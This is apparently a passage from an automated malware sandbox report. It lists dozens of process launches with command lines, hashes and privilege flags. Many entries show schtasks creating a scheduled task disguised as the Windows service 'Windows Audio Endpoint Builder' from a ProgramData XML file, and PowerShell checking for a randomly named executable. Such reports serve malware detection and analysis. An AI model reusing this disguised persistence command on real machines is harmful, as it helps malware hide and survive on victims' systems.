Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6844, Parent PID: 6804

General

Target ID:	98
Start time:	10:08:39
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	10:08:39
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	10:08:43
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	10:08:43
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	10:08:50
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5292, Parent PID: 7324

General

Target ID:	103
Start time:	10:08:50
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	10:08:55
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 6780, Parent PID: 6980

General

Target ID:	105
Start time:	10:08:56
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1816, Parent PID: 6780

General

Target ID:	106
Start time:	10:08:56
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	10:09:00
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	108
Start time:	10:09:02
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 2476, Parent PID: 6980

General

Target ID:	109
Start time:	10:09:03
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	10:09:03
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	10:09:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	112
Start time:	10:09:11
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	10:09:11
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	10:09:14
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 8100, Parent PID: 6980

General

Target ID:	115
Start time:	10:09:18
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	10:09:18
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	117
Start time:	10:09:19
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	118
Start time:	10:09:20
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7828, Parent PID: 8056

General

Target ID:	119
Start time:	10:09:25
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	120
Start time:	10:09:28
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7992, Parent PID: 7968

General

Target ID:	121
Start time:	10:09:28
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	10:09:32
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 1540, Parent PID: 6980

General

Target ID:	123
Start time:	10:09:38
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1216, Parent PID: 1540

General

Target ID:	124
Start time:	10:09:38
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	125
Start time:	10:09:38
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 6316, Parent PID: 6448

General

Target ID:	126
Start time:	10:09:40
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	127
Start time:	10:09:44
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	128
Start time:	10:09:48
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8160, Parent PID: 2168

General

Target ID:	129
Start time:	10:09:48
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	130
Start time:	10:09:50
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: cmd.exePID: 5688, Parent PID: 4196

General

Target ID:	131
Start time:	10:09:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7396, Parent PID: 7508

General

Target ID:	132
Start time:	10:09:56
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	133
Start time:	10:09:58
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	134
Start time:	10:09:58
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	135
Start time:	10:10:01
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	136
Start time:	10:10:08
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6272, Parent PID: 7768

General

Target ID:	137
Start time:	10:10:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	138
Start time:	10:10:09
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 6696, Parent PID: 6980

General

Target ID:	139
Start time:	10:10:18
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	140
Start time:	10:10:19
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	141
Start time:	10:10:20
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	142
Start time:	10:10:21
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 3548, Parent PID: 6980

General

Target ID:	143
Start time:	10:10:28
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6336, Parent PID: 3548

General

Target ID:	144
Start time:	10:10:28
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	145
Start time:	10:10:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	146
Start time:	10:10:32
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	147
Start time:	10:10:34
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: schtasks.exePID: 5560, Parent PID: 8020

General

Target ID:	148
Start time:	10:10:41
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	149
Start time:	10:10:37
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	150
Start time:	10:10:39
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3360, Parent PID: 3476

General

Target ID:	151
Start time:	10:10:39
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	152
Start time:	10:10:44
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	153
Start time:	10:10:44
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: schtasks.exePID: 2096, Parent PID: 6732

General

Target ID:	154
Start time:	10:10:48
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	155
Start time:	10:10:49
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6864, Parent PID: 1072

General

Target ID:	156
Start time:	10:10:49
